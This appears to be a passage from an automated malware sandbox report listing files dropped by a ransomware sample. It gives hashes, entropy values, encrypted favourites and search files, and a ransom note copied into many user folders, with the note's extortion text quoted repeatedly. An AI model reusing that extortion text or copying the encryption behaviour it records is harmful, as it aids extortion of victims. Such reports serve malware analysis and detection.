          Preview: ---=== Welcome. Again. ===--- [+] Whats Happen? [+] Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension su84mu33c1. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER). [+] What guarantees? [+] Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nob
          C:\Users\user\Favorites\Amazon.url
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):343
          Entropy (8bit):7.360708058190692
          Encrypted:false
          SSDEEP:6:elnb2z1ggqy7hvpul0u1yh/1oXk+vYro1wANxP7GjqhT6/XKArAGyohQ1QUM1:ex4FNvEu1j86ANh7HT6/XKArEBM1
          MD5:082D6F8C9385EEB2907743F5747358C5
          SHA1:1CDDA3020CD8BA0065AE59E24655CACAD435ECC7
          SHA-256:9DE3C5C7375CDE58CD6D8BF47352EEAAD58123F771136244493915B937F381A4
          SHA-512:EA7091FB317B4934CBC6BBEEF97D78235E38E3FD79E3F9B0565CDFC98EABD26AA528358221C6EF2F1CB614CF0EF61C9FAECFE98B8681BAC2E8084DC9CB047806
          Malicious:false
          C:\Users\user\Favorites\Bing.url
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):440
          Entropy (8bit):7.521497681152624
          Encrypted:false
          SSDEEP:12:/w68i5Baxudz91YyJ1j86ANh7HT6/XKArDf9tKOlltGZ:RVcxudZ1YyXADn+zDf9tvX8
          MD5:ACAAADF5B11F663E235E6394D89BF579
          SHA1:EC2242241765BD37D2661761CFE27931F5703FBB
          SHA-256:C9A02F3B81432325DDAAB7C6C784C01C4955E63C369E8FB1310CD05B7D3796E2
          SHA-512:AF5562BCAFB1F83397DF742E2A20976D820B7CD71964FD2BBBC673C82CFE7E4243448FEAD032BF87340301632A73E7CFF2254761E8EA3D09870B905B93548F39
          Malicious:false
          C:\Users\user\Favorites\Facebook.url
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):345
          Entropy (8bit):7.384697216731254
          Encrypted:false
          SSDEEP:6:Vdy7VVkPZ6cdpEE2/1oXk+vYro1wANxP7GjqhT6/XKArAGyoZG+XgUmFk:Vw7rkkcK1j86ANh7HT6/XKArOFk
          MD5:8CFC62441760458FA31AC6D611C7677D
          SHA1:C04F20448A7281B0CEE740AE864C47DC227C2CFA
          SHA-256:C2CDC84909F04F83D8BBC386D6546A65AB221636E72D36E901363894E2EAABB0
          SHA-512:A37A1424A8F23CD9CA887E4A4835BDA4DF20D8F382521CD7E564C62CB6DF47B8841F531D553D8ADAA8D7F6A03C95DB5C898CAAA5E179C7996E52E31852300DCC
          Malicious:false
          C:\Users\user\Favorites\Google.url
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):343
          Entropy (8bit):7.343738509572857
          Encrypted:false
          SSDEEP:6:WoRbZOMrsuTWcJYLg9Ys73Dl/1oXk+vYro1wANxP7GjqhT6/XKArAGyonklilp:ltZDrQVLwYyx1j86ANh7HT6/XKAruli3
          MD5:ED4C4921E1FCDEA28FB88E212BD05F8A
          SHA1:DE16B7D60655F2C70351260BA2017827FAF4C5D1
          SHA-256:5F200DD3B89D034C44C0D81CC8E29E4F02D92C28D5DEA5D6E820B02A67AF5D63
          SHA-512:BA0275A449F3A2E2009961FFB3D268601215359579B3C56D49417AE0597CE020AECD2AEF5234BFF417ED2F5C208F55D58C95E1C59ACBC042F7ED95D51145EA6A
          Malicious:false
          C:\Users\user\Favorites\Links\su84mu33c1-readme.txt
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):6986
          Entropy (8bit):3.884573571713338
          Encrypted:false
          SSDEEP:96:GLFiNsg6xU3TPCg/e5ruWRQtw6CE8wqXqdX/yVZ//yvJVvYd9PrR5u:GLFI3jNm5NRweEpqaCZHyvTYDW
          MD5:AC24FEF346A4ABC3D58DC0A275DD2B6D
          SHA1:D3E8478274AF8DAC23A93E92935A82CE842E4D0C
          SHA-256:61E4594725A672557902324A10158C82EED2565BBF33A022249F6160E4FA7AA0
          SHA-512:C0C002EF44B15144CFAA9561E27BFE19216F9B6E59252513550A69F3C7845F4395F4BC4403C15B392B3F8785A9C64A86E8067E1589441867CBAFAD4D630607E1
          Malicious:false
          Preview (UTF-16LE, decoded): ---=== Welcome. Again. ===--- [+] Whats Happen? [+] Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension su84mu33c1. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER). [+] What guarantees? [+] Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nob
          C:\Users\user\Favorites\Live.url
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:DOS executable (COM)
          Category:dropped
          Size (bytes):341
          Entropy (8bit):7.319753579928835
          Encrypted:false
          SSDEEP:6:QQw1tDoQs1CkbTl/1oXk+vYro1wANxP7GjqhT6/XKArAGyoTN0N4f7:QQIkXXT91j86ANh7HT6/XKAruQ
          MD5:FAF2DD716737CE792425B6F5BF254F04
          SHA1:A625608E38971759E3682D417A68622EB89BD328
          SHA-256:C007EE267C3B86D6D0E778AF4289F44EEB01EEE4BBE32732F0F9AF956A237F34
          SHA-512:4A016A429751537B952720E585C110EBBBE4D29A6D69B2D1C797AAE5407885021880DF13699EB87FA57A246F5927EDB7FA64914B3612EABAEA8DC9BE5E04C910
          Malicious:false
          Preview: .d..U..&3...{........t.4..6j.N..-..=*...p..`.S..T.........U8#YC5............./......Dg*....!.q=DH..R..gx..-...3U...I....\U.rD`_T.D...o...w.G..V.N....vkXn..s...~.4..x;X..C.}DK.......Hsa(`...1.3..0C.AV.1..R...|bi..6......6N.../.....c...........8l..8..[9..W..|...f..<.hN..T......v...D...P{K..`b..Y..a]..........].
          C:\Users\user\Favorites\NYTimes.url
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):344
          Entropy (8bit):7.41194918481912
          Encrypted:false
          SSDEEP:6:G9i10AoK3Tc/H/ggD4FGs/1oXk+vYro1wANxP7GjqhT6/XKArAGyoYIDoRgp1/+A:CxAt3Tc/431j86ANh7HT6/XKAreIPll
          MD5:AC28FF9833D49A33F196F36C6E5A1311
          SHA1:8134B9959629C1B8488138F22FA7EA054B561003
          SHA-256:E3A266DFD530E1707CDD59969442647A7A8526B9B3D1DF8DD780020DBD8F6A7F
          SHA-512:1A14B3D89F0DB6EC4E4F09FD06B76F5ADBC83604FC9FED49C1E66BFFD57FC385F2F17FE455559B35E39384CA8C560BB0E14F87D4FBB9C7A80D13887E5A316793
          Malicious:false
          Preview: '.[.f.s....9C.P..d_.muL.."....A.'.r#...&x%l9I..i.H.V.b...q..2..J..t/...zk.7lUqeN....+.W.v48.[....o...o...gx..-...3U...I....\U.rD`_T.D...o...w.G..V.N....vkXn..s...~.4..x;X..C.}DK.......Hsa(`...1.3..0C.AV.1..R...|bi..6......6N.../.....c...........8l..8..[9..W..|?..6.cH-..|..r,w.ch\.r[.O..F.f..r...E..p.........W^.
          C:\Users\user\Favorites\Reddit.url
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):343
          Entropy (8bit):7.382834455736758
          Encrypted:false
          SSDEEP:6:5AHzmpNUoRjirHKDIFwNAfj6/1oXk+vYro1wANxP7GjqhT6/XKArAGyo31gk6Q5O:yTmpNxMKDAfO1j86ANh7HT6/XKArxH5O
          MD5:FCCEDF535B980C099CF5BBB08BCF60F0
          SHA1:BD21FE275BCE5F160776E922EE8589661D4F55B8
          SHA-256:66139BC137D02DD6F7FCB51A264B90A812760875D4FA0A2FE35D4F2A023A2CA7
          SHA-512:1BBA77E948E5F186F80143CD737FECD1B1A53E28985802F56F50C77B107118DE2A5013177EAA3EA9FA917DE8D27D5DFD52369E9F07DBF63D9A8A18F96F2D712F
          Malicious:false
          Preview: ........K>.E.....`.s?(3..1.....OdD.t...O.s.{..e..N.BO;..i.../.4.K.].p..,n..gJ..3.TC..)'."..Go....0Tva(PF..{Y..gx..-...3U...I....\U.rD`_T.D...o...w.G..V.N....vkXn..s...~.4..x;X..C.}DK.......Hsa(`...1.3..0C.AV.1..R...|bi..6......6N.../.....c...........8l..8..[9..W..|-.Qh.r....A..X>........B..\._Z.@..._K.$t.........Gr..
          C:\Users\user\Favorites\Twitter.url
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):344
          Entropy (8bit):7.386133532141108
          Encrypted:false
          SSDEEP:6:CAXL6f1sLsyLwt9/1oXk+vYro1wANxP7GjqhT6/XKArAGyo94i2ZWy/Wp:C2L6fqoOg1j86ANh7HT6/XKAr/4i2Zep
          MD5:6566507248990DD555A44CA02F7C5B5D
          SHA1:74569E2D503A72A3CDFEA57E4C5EB1F08AA8F6EA
          SHA-256:B3560283EBFDE7E2B9AF728A352F9F16A604C00B8F09E765019F15BDCEE13DE7
          SHA-512:0787525F2D7B80815A0764809618CAB4A5661F2E3A145916A6B3E7828830AAAEA5B2797A3B795CFA6FDA4326EF4325CC18B841B0D1209EDFA5B8F53812C58860
          Malicious:false
          Preview: n/.k.;....LK...y0.,.p......L.u...-G.V.iAt..*.x..Oq/e.$..c...p..<.%..J1sOE......v..F...2.uU.(.w..k..(i.6n.......gx..-...3U...I....\U.rD`_T.D...o...w.G..V.N....vkXn..s...~.4..x;X..C.}DK.......Hsa(`...1.3..0C.AV.1..R...|bi..6......6N.../.....c...........8l..8..[9..W..|k.N...n.Q$..i.]f.J....&glE..0i. y...]X..............C
          C:\Users\user\Favorites\Wikipedia.url
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):346
          Entropy (8bit):7.33824137946001
          Encrypted:false
          SSDEEP:6:0snMwKNtRXNrWkEW/1oXk+vYro1wANxP7GjqhT6/XKArAGyo/4IOll:0SMwKNtR9vX1j86ANh7HT6/XKAr6ll
          MD5:270F073961DD8629614E5E6304A7964E
          SHA1:7E28051FEB5009403FD21BF543AAE28280BA7FF6
          SHA-256:DF6C40D0E5862A65E61C5EFBD8694E46E2658CF76921D7B5E50F7D370AFBCF55
          SHA-512:F6A582E6501A0E533B5157AB0FC35D7C097354696722768DCE11DB98151363BB6908DE63AFFFE31378CC4F03601F0F3F83CAD52B53536F85CAB95C067868A7FE
          Malicious:false
          Preview: ...e...S[zG..)e8.4.!....a.p.....8...Q......H.m\1lp?9T....mF.G..(..V.q!.".U............9.`F.\.......B.3..gx..-...3U...I....\U.rD`_T.D...o...w.G..V.N....vkXn..s...~.4..x;X..C.}DK.......Hsa(`...1.3..0C.AV.1..R...|bi..6......6N.../.....c...........8l..8..[9..W..|N.#,f..LaY Hed.X...E...%.....6$..,/.2.}...........N,.
          C:\Users\user\Favorites\Youtube.url
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):344
          Entropy (8bit):7.384531815721122
          Encrypted:false
          SSDEEP:6:Ax6u9K7fhMuhaY7iTfY7es/1oXk+vYro1wANxP7GjqhT6/XKArAGyo/bfA9Cu9rS:yKbh/aY7iw1j86ANh7HT6/XKArtboS
          MD5:4940D3F33B9CDAEC0A00E1C7875C4341
          SHA1:F03C5228D94C21D6ED35263B68AA3029DD31D1D4
          SHA-256:75038A1ECE0DC818489137B927FA2C193ED6A11FAD89F0D7BAA22C72494BADD7
          SHA-512:DAF209EBCCBE60F1A41273007609F1A9D829FAB43CFDEFAC5F42683058F14EA2803D7AB44A965C0912523E1CA81F50E13266A9DA3A5EB859CE1E992D028CF54F
          Malicious:false
          Preview: .B#\FhfX......;~.;S.nr.v.]..a...n..zB.+......?D..[.......x....E.....}R...G...K[...v-R..m.`.O.....|$C.<....z'....gx..-...3U...I....\U.rD`_T.D...o...w.G..V.N....vkXn..s...~.4..x;X..C.}DK.......Hsa(`...1.3..0C.AV.1..R...|bi..6......6N.../.....c...........8l..8..[9..W..|T..*...(....?.#K.C0....6.P.#9.e..7>.<+..K..........L...
          C:\Users\user\Favorites\su84mu33c1-readme.txt
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):6986
          Entropy (8bit):3.884573571713338
          Encrypted:false
          SSDEEP:96:GLFiNsg6xU3TPCg/e5ruWRQtw6CE8wqXqdX/yVZ//yvJVvYd9PrR5u:GLFI3jNm5NRweEpqaCZHyvTYDW
          MD5:AC24FEF346A4ABC3D58DC0A275DD2B6D
          SHA1:D3E8478274AF8DAC23A93E92935A82CE842E4D0C
          SHA-256:61E4594725A672557902324A10158C82EED2565BBF33A022249F6160E4FA7AA0
          SHA-512:C0C002EF44B15144CFAA9561E27BFE19216F9B6E59252513550A69F3C7845F4395F4BC4403C15B392B3F8785A9C64A86E8067E1589441867CBAFAD4D630607E1
          Malicious:false
          Preview (UTF-16LE, decoded): ---=== Welcome. Again. ===--- [+] Whats Happen? [+] Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension su84mu33c1. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER). [+] What guarantees? [+] Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nob
          C:\Users\user\Links\su84mu33c1-readme.txt
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):6986
          Entropy (8bit):3.884573571713338
          Encrypted:false
          SSDEEP:96:GLFiNsg6xU3TPCg/e5ruWRQtw6CE8wqXqdX/yVZ//yvJVvYd9PrR5u:GLFI3jNm5NRweEpqaCZHyvTYDW
          MD5:AC24FEF346A4ABC3D58DC0A275DD2B6D
          SHA1:D3E8478274AF8DAC23A93E92935A82CE842E4D0C
          SHA-256:61E4594725A672557902324A10158C82EED2565BBF33A022249F6160E4FA7AA0
          SHA-512:C0C002EF44B15144CFAA9561E27BFE19216F9B6E59252513550A69F3C7845F4395F4BC4403C15B392B3F8785A9C64A86E8067E1589441867CBAFAD4D630607E1
          Malicious:false
          Preview (UTF-16LE, decoded): ---=== Welcome. Again. ===--- [+] Whats Happen? [+] Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension su84mu33c1. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER). [+] What guarantees? [+] Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nob
          C:\Users\user\Music\su84mu33c1-readme.txt
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):6986
          Entropy (8bit):3.884573571713338
          Encrypted:false
          SSDEEP:96:GLFiNsg6xU3TPCg/e5ruWRQtw6CE8wqXqdX/yVZ//yvJVvYd9PrR5u:GLFI3jNm5NRweEpqaCZHyvTYDW
          MD5:AC24FEF346A4ABC3D58DC0A275DD2B6D
          SHA1:D3E8478274AF8DAC23A93E92935A82CE842E4D0C
          SHA-256:61E4594725A672557902324A10158C82EED2565BBF33A022249F6160E4FA7AA0
          SHA-512:C0C002EF44B15144CFAA9561E27BFE19216F9B6E59252513550A69F3C7845F4395F4BC4403C15B392B3F8785A9C64A86E8067E1589441867CBAFAD4D630607E1
          Malicious:false
          Preview (UTF-16LE, decoded): ---=== Welcome. Again. ===--- [+] Whats Happen? [+] Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension su84mu33c1. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER). [+] What guarantees? [+] Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nob
          C:\Users\user\OneDrive\su84mu33c1-readme.txt
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):6986
          Entropy (8bit):3.884573571713338
          Encrypted:false
          SSDEEP:96:GLFiNsg6xU3TPCg/e5ruWRQtw6CE8wqXqdX/yVZ//yvJVvYd9PrR5u:GLFI3jNm5NRweEpqaCZHyvTYDW
          MD5:AC24FEF346A4ABC3D58DC0A275DD2B6D
          SHA1:D3E8478274AF8DAC23A93E92935A82CE842E4D0C
          SHA-256:61E4594725A672557902324A10158C82EED2565BBF33A022249F6160E4FA7AA0
          SHA-512:C0C002EF44B15144CFAA9561E27BFE19216F9B6E59252513550A69F3C7845F4395F4BC4403C15B392B3F8785A9C64A86E8067E1589441867CBAFAD4D630607E1
          Malicious:false
          Preview (UTF-16LE, decoded): ---=== Welcome. Again. ===--- [+] Whats Happen? [+] Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension su84mu33c1. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER). [+] What guarantees? [+] Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nob
          C:\Users\user\Pictures\Camera Roll\su84mu33c1-readme.txt
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):6986
          Entropy (8bit):3.884573571713338
          Encrypted:false
          SSDEEP:96:GLFiNsg6xU3TPCg/e5ruWRQtw6CE8wqXqdX/yVZ//yvJVvYd9PrR5u:GLFI3jNm5NRweEpqaCZHyvTYDW
          MD5:AC24FEF346A4ABC3D58DC0A275DD2B6D
          SHA1:D3E8478274AF8DAC23A93E92935A82CE842E4D0C
          SHA-256:61E4594725A672557902324A10158C82EED2565BBF33A022249F6160E4FA7AA0
          SHA-512:C0C002EF44B15144CFAA9561E27BFE19216F9B6E59252513550A69F3C7845F4395F4BC4403C15B392B3F8785A9C64A86E8067E1589441867CBAFAD4D630607E1
          Malicious:false
          Preview (UTF-16LE, decoded): ---=== Welcome. Again. ===--- [+] Whats Happen? [+] Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension su84mu33c1. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER). [+] What guarantees? [+] Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nob
          C:\Users\user\Pictures\su84mu33c1-readme.txt
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):6986
          Entropy (8bit):3.884573571713338
          Encrypted:false
          SSDEEP:96:GLFiNsg6xU3TPCg/e5ruWRQtw6CE8wqXqdX/yVZ//yvJVvYd9PrR5u:GLFI3jNm5NRweEpqaCZHyvTYDW
          MD5:AC24FEF346A4ABC3D58DC0A275DD2B6D
          SHA1:D3E8478274AF8DAC23A93E92935A82CE842E4D0C
          SHA-256:61E4594725A672557902324A10158C82EED2565BBF33A022249F6160E4FA7AA0
          SHA-512:C0C002EF44B15144CFAA9561E27BFE19216F9B6E59252513550A69F3C7845F4395F4BC4403C15B392B3F8785A9C64A86E8067E1589441867CBAFAD4D630607E1
          Malicious:false
          Preview (UTF-16LE, decoded): ---=== Welcome. Again. ===--- [+] Whats Happen? [+] Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension su84mu33c1. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER). [+] What guarantees? [+] Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nob
          C:\Users\user\Recent\su84mu33c1-readme.txt
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):6986
          Entropy (8bit):3.884573571713338
          Encrypted:false
          SSDEEP:96:GLFiNsg6xU3TPCg/e5ruWRQtw6CE8wqXqdX/yVZ//yvJVvYd9PrR5u:GLFI3jNm5NRweEpqaCZHyvTYDW
          MD5:AC24FEF346A4ABC3D58DC0A275DD2B6D
          SHA1:D3E8478274AF8DAC23A93E92935A82CE842E4D0C
          SHA-256:61E4594725A672557902324A10158C82EED2565BBF33A022249F6160E4FA7AA0
          SHA-512:C0C002EF44B15144CFAA9561E27BFE19216F9B6E59252513550A69F3C7845F4395F4BC4403C15B392B3F8785A9C64A86E8067E1589441867CBAFAD4D630607E1
          Malicious:false
          Preview (UTF-16LE, decoded): ---=== Welcome. Again. ===--- [+] Whats Happen? [+] Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension su84mu33c1. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER). [+] What guarantees? [+] Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nob
          C:\Users\user\Saved Games\su84mu33c1-readme.txt
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):6986
          Entropy (8bit):3.884573571713338
          Encrypted:false
          SSDEEP:96:GLFiNsg6xU3TPCg/e5ruWRQtw6CE8wqXqdX/yVZ//yvJVvYd9PrR5u:GLFI3jNm5NRweEpqaCZHyvTYDW
          MD5:AC24FEF346A4ABC3D58DC0A275DD2B6D
          SHA1:D3E8478274AF8DAC23A93E92935A82CE842E4D0C
          SHA-256:61E4594725A672557902324A10158C82EED2565BBF33A022249F6160E4FA7AA0
          SHA-512:C0C002EF44B15144CFAA9561E27BFE19216F9B6E59252513550A69F3C7845F4395F4BC4403C15B392B3F8785A9C64A86E8067E1589441867CBAFAD4D630607E1
          Malicious:false
          Preview (UTF-16LE, decoded): ---=== Welcome. Again. ===--- [+] Whats Happen? [+] Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension su84mu33c1. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER). [+] What guarantees? [+] Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nob
          C:\Users\user\Searches\Everywhere.search-ms
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):480
          Entropy (8bit):7.53934524568469
          Encrypted:false
          SSDEEP:12:3Bq0hF7mM3qVwrZnwAwzz1j86ANh7HT6/XKAr4JflL:zH7mMdhwVRXADn+zalL
          MD5:8B54EF9801C0120AEE6EFD1E0B4BB7A8
          SHA1:A9ADE0E45DFB5BD42938290B5AEB32A8DC8BA567
          SHA-256:C0669B2316323C0831722ED2E05FF8CBA37A27EF05B9694C5FDCC1BC362DFECF
          SHA-512:6C82795FD3C99C5346BEF31AF92110CF80CA1B1F7B433640901E24E6D6D502E2C1AD5E35E3A6C7B7D4FA55D6B2E75BC8C85F3F0195C675FE3AAC3D64E2BBD33B
          Malicious:false
          Preview: ...)9.....d(.z..`.)[.:d......._..8..->%.G..U.z/....`.T^.........x..8PN..W.'O.k..4.......1k...~2...../..ch..../.{8..R.x.58.\G...U.......+.O.g9....h 0..k.l6......G)_I...9...1.|......D%......p.QwL.D....Z...Q....I. E..I...`..G..........7y..gx..-...3U...I....\U.rD`_T.D...o...w.G..V.N....vkXn..s...~.4..x;X..C.}DK.......Hsa(`...1.3..0C.AV.1..R...|bi..6......6N.../.....c...........8l..8..[9..W..|.b.&..PJ...3f...bQ.vH.YE&c.......H....3..4..........G\.
          C:\Users\user\Searches\Indexed Locations.search-ms
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):480
          Entropy (8bit):7.524178482347865
          Encrypted:false
          SSDEEP:12:ZGEUDw0Bca8yCfNd0nvrencHyM1j86ANh7HT6/XKArFrFQf:Daw0BccSd0nvrencHvXADn+zXQf
          MD5:4F39322A457E9A6B67DE4EBB87A70F0C
          SHA1:A81E3FE7D40A154B32D844BF5DDF34EE3974D8B8
          SHA-256:9A8292D15EBE02D8CAF0AB95F678F92B8A8648A54CF7C1CFDBC2D4F236A7FD41
          SHA-512:3FF9A81A3702770A849D03DF272AC6316A445EE4C0D2878608FD7FA1B1C8EDBFFAC4F5DBC306782F61410CBBEDBD143F05720FB166C3EB073C0F7033A5D02242
          Malicious:false
          Preview: iUzQV~......).zA|....}R.rqf......J).o.<u..]-{.}.>.f..m~s?.j...h.;5.p....nE...3..ckY.g .._.f.L....0N..w..M...].9J..?u.a.}{a.......5g.G/...e...IG.1...."M..3.J.....p..."'Jv....1...j-w@."iy.m....S$k6I.9Q.....J.b~....Rt9W......i.a.....R.....f..gx..-...3U...I....\U.rD`_T.D...o...w.G..V.N....vkXn..s...~.4..x;X..C.}DK.......Hsa(`...1.3..0C.AV.1..R...|bi..6......6N.../.....c...........8l..8..[9..W..|...r....x.V|.|.Xq.,....\..."~l..jij....Q.............
          C:\Users\user\Searches\su84mu33c1-readme.txt
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):6986
          Entropy (8bit):3.884573571713338
          Encrypted:false
          SSDEEP:96:GLFiNsg6xU3TPCg/e5ruWRQtw6CE8wqXqdX/yVZ//yvJVvYd9PrR5u:GLFI3jNm5NRweEpqaCZHyvTYDW
          MD5:AC24FEF346A4ABC3D58DC0A275DD2B6D
          SHA1:D3E8478274AF8DAC23A93E92935A82CE842E4D0C
          SHA-256:61E4594725A672557902324A10158C82EED2565BBF33A022249F6160E4FA7AA0
          SHA-512:C0C002EF44B15144CFAA9561E27BFE19216F9B6E59252513550A69F3C7845F4395F4BC4403C15B392B3F8785A9C64A86E8067E1589441867CBAFAD4D630607E1
          Malicious:false
          Preview (UTF-16LE, decoded): ---=== Welcome. Again. ===--- [+] Whats Happen? [+] Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension su84mu33c1. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER). [+] What guarantees? [+] Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nob
          C:\Users\user\Videos\su84mu33c1-readme.txt
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):6986
          Entropy (8bit):3.884573571713338
          Encrypted:false
          SSDEEP:96:GLFiNsg6xU3TPCg/e5ruWRQtw6CE8wqXqdX/yVZ//yvJVvYd9PrR5u:GLFI3jNm5NRweEpqaCZHyvTYDW
          MD5:AC24FEF346A4ABC3D58DC0A275DD2B6D
          SHA1:D3E8478274AF8DAC23A93E92935A82CE842E4D0C
          SHA-256:61E4594725A672557902324A10158C82EED2565BBF33A022249F6160E4FA7AA0
          SHA-512:C0C002EF44B15144CFAA9561E27BFE19216F9B6E59252513550A69F3C7845F4395F4BC4403C15B392B3F8785A9C64A86E8067E1589441867CBAFAD4D630607E1
          Malicious:false
          Preview (UTF-16LE, decoded): ---=== Welcome. Again. ===--- [+] Whats Happen? [+] Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension su84mu33c1. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER). [+] What guarantees? [+] Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nob
          C:\Users\user\su84mu33c1-readme.txt
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):6986
          Entropy (8bit):3.884573571713338
          Encrypted:false
          SSDEEP:96:GLFiNsg6xU3TPCg/e5ruWRQtw6CE8wqXqdX/yVZ//yvJVvYd9PrR5u:GLFI3jNm5NRweEpqaCZHyvTYDW
          MD5:AC24FEF346A4ABC3D58DC0A275DD2B6D
          SHA1:D3E8478274AF8DAC23A93E92935A82CE842E4D0C
          SHA-256:61E4594725A672557902324A10158C82EED2565BBF33A022249F6160E4FA7AA0
          SHA-512:C0C002EF44B15144CFAA9561E27BFE19216F9B6E59252513550A69F3C7845F4395F4BC4403C15B392B3F8785A9C64A86E8067E1589441867CBAFAD4D630607E1
          Malicious:false
          Preview (UTF-16LE, decoded): ---=== Welcome. Again. ===--- [+] Whats Happen? [+] Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension su84mu33c1. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER). [+] What guarantees? [+] Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nob
          C:\Users\su84mu33c1-readme.txt
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):6986
          Entropy (8bit):3.884573571713338
          Encrypted:false
          SSDEEP:96:GLFiNsg6xU3TPCg/e5ruWRQtw6CE8wqXqdX/yVZ//yvJVvYd9PrR5u:GLFI3jNm5NRweEpqaCZHyvTYDW
          MD5:AC24FEF346A4ABC3D58DC0A275DD2B6D
          SHA1:D3E8478274AF8DAC23A93E92935A82CE842E4D0C
          SHA-256:61E4594725A672557902324A10158C82EED2565BBF33A022249F6160E4FA7AA0
          SHA-512:C0C002EF44B15144CFAA9561E27BFE19216F9B6E59252513550A69F3C7845F4395F4BC4403C15B392B3F8785A9C64A86E8067E1589441867CBAFAD4D630607E1
          Malicious:false
          Preview (UTF-16LE, decoded): ---=== Welcome. Again. ===--- [+] Whats Happen? [+] Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension su84mu33c1. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER). [+] What guarantees? [+] Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nob
